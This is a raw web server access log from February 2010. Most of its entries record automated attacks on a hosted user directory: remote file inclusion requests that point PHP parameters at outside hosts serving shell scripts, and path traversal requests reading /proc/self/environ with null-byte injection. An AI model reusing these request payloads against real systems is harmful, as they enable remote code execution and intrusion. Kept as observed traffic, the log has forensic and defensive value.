79.170.45.126 - - [01/Feb/2010:13:10:06 -0800] "GET /~t290/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310 /home/users/t/t290/public_html/logs///kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:06 -0800] "GET /~t290/logs/access.log.0%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 325 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:07 -0800] "GET /~t290/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310 /home/users/t/t290/public_html/logs///kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:07 -0800] "GET /~t290///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 305 /home/users/t/t290/public_html/kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:07 -0800] "GET /~t290/logs/access.log.0%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 325 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:11 -0800] "GET /~t290///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 305 /home/users/t/t290/public_html/kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:11 -0800] "GET /~t290/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310 /home/users/t/t290/public_html/logs///kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:11 -0800] "GET /~t290/logs/access.log.0%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 325 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:29 -0800] "GET /~t290///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 305 /home/users/t/t290/public_html/kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:29 -0800] "GET /~t290/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310 /home/users/t/t290/public_html/logs///kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:29 -0800] "GET /~t290/logs/access.log.0%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 325 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:30 -0800] "GET /~t290/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310 /home/users/t/t290/public_html/logs///kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:30 -0800] "GET /~t290/logs/access.log.0%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 325 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:30 -0800] "GET /~t290///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 305 /home/users/t/t290/public_html/kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:35 -0800] "GET /~t290/logs/access.log.0%20%20///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 325 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:35 -0800] "GET /~t290/logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310 /home/users/t/t290/public_html/logs///kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:10:35 -0800] "GET /~t290///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 305 /home/users/t/t290/public_html/kboard "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:44:18 -0800] "GET /~t290/logs/access.log.0///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 323 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:47:04 -0800] "GET /~t290/logs/access.log.0///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 323 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:13:47:12 -0800] "GET /~t290/logs/access.log.0///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 323 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
115.68.4.15 - - [01/Feb/2010:14:02:28 -0800] "GET /~t290/logs//delete_all.php?board_skin_path=http://atlantadigital.com///sh/id1.txt????? HTTP/1.1" 404 306 /home/users/t/t290/public_html/logs//delete_all.php "-" "Mozilla/5.0" 0 web.hypersurf.com
115.68.4.15 - - [01/Feb/2010:14:02:28 -0800] "GET /~t290//delete_all.php?board_skin_path=http://atlantadigital.com///sh/id1.txt????? HTTP/1.1" 404 301 /home/users/t/t290/public_html/delete_all.php "-" "Mozilla/5.0" 0 web.hypersurf.com
115.68.4.15 - - [01/Feb/2010:14:02:28 -0800] "GET /~t290/logs/access.log//delete_all.php?board_skin_path=http://atlantadigital.com///sh/id1.txt????? HTTP/1.1" 404 317 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
115.68.4.15 - - [01/Feb/2010:14:03:30 -0800] "GET /~t290/logs//delete_all.php?board_skin_path=http://atlantadigital.com///sh/id1.txt????? HTTP/1.1" 404 306 /home/users/t/t290/public_html/logs//delete_all.php "-" "Mozilla/5.0" 0 web.hypersurf.com
115.68.4.15 - - [01/Feb/2010:14:03:30 -0800] "GET /~t290/logs/access.log//delete_all.php?board_skin_path=http://atlantadigital.com///sh/id1.txt????? HTTP/1.1" 404 317 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
115.68.4.15 - - [01/Feb/2010:14:03:30 -0800] "GET /~t290//delete_all.php?board_skin_path=http://atlantadigital.com///sh/id1.txt????? HTTP/1.1" 404 301 /home/users/t/t290/public_html/delete_all.php "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:14:16:10 -0800] "GET /~t290/logs/access.log.0///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 323 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
67.195.115.185 - - [01/Feb/2010:14:25:25 -0800] "GET /~t290/logs/Sep02.html HTTP/1.0" 200 17769 /home/users/t/t290/public_html/logs/Sep02.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:14:44:21 -0800] "GET /~t290/logs/access.log.0///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 323 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
79.170.45.126 - - [01/Feb/2010:14:51:46 -0800] "GET /~t290/logs/access.log.0///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 323 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
207.218.200.0 - - [01/Feb/2010:15:37:50 -0800] "GET /~t290/logs///vwar/backup/errors.php?error=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs///vwar "-" "Mozilla/5.0" 0 web.hypersurf.com
207.218.200.0 - - [01/Feb/2010:15:37:50 -0800] "GET /~t290///vwar/backup/errors.php?error=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 310 /home/users/t/t290/public_html/vwar "-" "Mozilla/5.0" 0 web.hypersurf.com
207.218.200.0 - - [01/Feb/2010:15:37:50 -0800] "GET /~t290/logs/access.log%20%20///vwar/backup/errors.php?error=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 328 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
79.98.23.9 - - [01/Feb/2010:15:51:41 -0800] "GET /~t290/logs////index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 303 /home/users/t/t290/public_html/logs////index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
79.98.23.9 - - [01/Feb/2010:15:51:41 -0800] "GET /~t290/logs/access.log%20%20////index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
79.98.23.9 - - [01/Feb/2010:15:51:41 -0800] "GET /~t290////index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 298 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
60.251.165.181 - - [01/Feb/2010:16:00:15 -0800] "GET /~t290/logs/access.log.0%20%20//?index.php?mosConfig_absolute_path=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 404 307 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
60.251.165.181 - - [01/Feb/2010:16:00:15 -0800] "GET /~t290/logs//?index.php?mosConfig_absolute_path=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 200 13390 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
60.251.165.181 - - [01/Feb/2010:16:00:16 -0800] "GET /~t290//?index.php?mosConfig_absolute_path=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 200 903 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
222.73.17.7 - - [01/Feb/2010:16:02:54 -0800] "GET /~t290/logs/access.log%20%20////index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
222.73.17.7 - - [01/Feb/2010:16:02:54 -0800] "GET /~t290////index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 298 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
222.73.17.7 - - [01/Feb/2010:16:02:54 -0800] "GET /~t290/logs////index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 303 /home/users/t/t290/public_html/logs////index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
219.94.194.248 - - [01/Feb/2010:16:03:15 -0800] "GET /~t290/logs/access.log%20%20////index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
219.94.194.248 - - [01/Feb/2010:16:03:15 -0800] "GET /~t290////index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 298 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
219.94.194.248 - - [01/Feb/2010:16:03:16 -0800] "GET /~t290/logs////index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 303 /home/users/t/t290/public_html/logs////index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
200.234.200.155 - - [01/Feb/2010:16:09:13 -0800] "GET /~t290/logs/access.log//parse/parser.php?WN_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" 0 web.hypersurf.com
200.234.200.155 - - [01/Feb/2010:16:09:13 -0800] "GET /~t290/logs/access.log//parse/parser.php?WN_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 319 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" 0 web.hypersurf.com
200.234.200.155 - - [01/Feb/2010:16:13:37 -0800] "GET /~t290/logs/access.log.0//parse/parser.php?WN_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" 0 web.hypersurf.com
200.234.200.155 - - [01/Feb/2010:16:13:38 -0800] "GET /~t290/logs/access.log.0//parse/parser.php?WN_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 321 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" 0 web.hypersurf.com
222.73.17.7 - - [01/Feb/2010:16:15:35 -0800] "GET /~t290/logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.maumgolf.com/gnuboard4/data/file/_vti_sbin/fxd? HTTP/1.1" 404 300 /home/users/t/t290/public_html/logs/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
222.73.17.7 - - [01/Feb/2010:16:15:40 -0800] "GET /~t290/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.maumgolf.com/gnuboard4/data/file/_vti_sbin/fxd? HTTP/1.1" 404 295 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
222.73.17.7 - - [01/Feb/2010:16:15:40 -0800] "GET /~t290/logs/access.log.0%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.maumgolf.com/gnuboard4/data/file/_vti_sbin/fxd? HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
60.251.165.181 - - [01/Feb/2010:16:15:45 -0800] "GET /~t290/logs/access.log.0%20%20//?index.php?mosConfig_absolute_path=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 404 307 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
60.251.165.181 - - [01/Feb/2010:16:15:45 -0800] "GET /~t290//?index.php?mosConfig_absolute_path=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 200 903 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
60.251.165.181 - - [01/Feb/2010:16:15:45 -0800] "GET /~t290/logs//?index.php?mosConfig_absolute_path=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 200 13390 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
79.98.23.9 - - [01/Feb/2010:16:17:50 -0800] "GET /~t290/logs/access.log////index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 314 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
222.73.17.7 - - [01/Feb/2010:16:27:02 -0800] "GET /~t290/logs/access.log////index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 314 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
219.94.194.248 - - [01/Feb/2010:16:27:42 -0800] "GET /~t290/logs/access.log////index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 314 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
222.73.17.7 - - [01/Feb/2010:16:35:21 -0800] "GET /~t290/logs/access.log.0/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.maumgolf.com/gnuboard4/data/file/_vti_sbin/fxd? HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
200.234.200.155 - - [01/Feb/2010:16:35:40 -0800] "GET /~t290/logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" 0 web.hypersurf.com
200.234.200.155 - - [01/Feb/2010:16:35:41 -0800] "GET /~t290/logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 346 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" 0 web.hypersurf.com
200.234.200.155 - - [01/Feb/2010:16:40:19 -0800] "GET /~t290/logs/access.log.0//assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 348 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" 0 web.hypersurf.com
200.234.200.155 - - [01/Feb/2010:16:40:20 -0800] "GET /~t290/logs/access.log.0//assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 348 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" 0 web.hypersurf.com
207.218.200.0 - - [01/Feb/2010:16:49:07 -0800] "GET /~t290/logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs//technote7 "-" "Mozilla/5.0" 0 web.hypersurf.com
207.218.200.0 - - [01/Feb/2010:16:49:07 -0800] "GET /~t290//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 351 /home/users/t/t290/public_html/technote7 "-" "Mozilla/5.0" 0 web.hypersurf.com
207.218.200.0 - - [01/Feb/2010:16:49:07 -0800] "GET /~t290/logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 367 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
207.218.200.0 - - [01/Feb/2010:16:52:16 -0800] "GET /~t290/logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 369 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
83.149.110.210 - - [01/Feb/2010:16:58:28 -0800] "GET /~t290//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nanumsoft.com/gnuboard4/data/geditor/id1.txt?? HTTP/1.1" 404 351 /home/users/t/t290/public_html/technote7 "-" "Mozilla/5.0" 0 web.hypersurf.com
83.149.110.210 - - [01/Feb/2010:16:58:28 -0800] "GET /~t290/logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nanumsoft.com/gnuboard4/data/geditor/id1.txt?? HTTP/1.1" 404 356 /home/users/t/t290/public_html/logs//technote7 "-" "Mozilla/5.0" 0 web.hypersurf.com
83.149.110.210 - - [01/Feb/2010:16:58:32 -0800] "GET /~t290/logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nanumsoft.com/gnuboard4/data/geditor/id1.txt?? HTTP/1.1" 404 369 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
83.149.110.210 - - [01/Feb/2010:16:59:22 -0800] "GET /~t290/logs/access.log.0%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nanumsoft.com/gnuboard4/data/geditor/id1.txt?? HTTP/1.1" 404 371 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
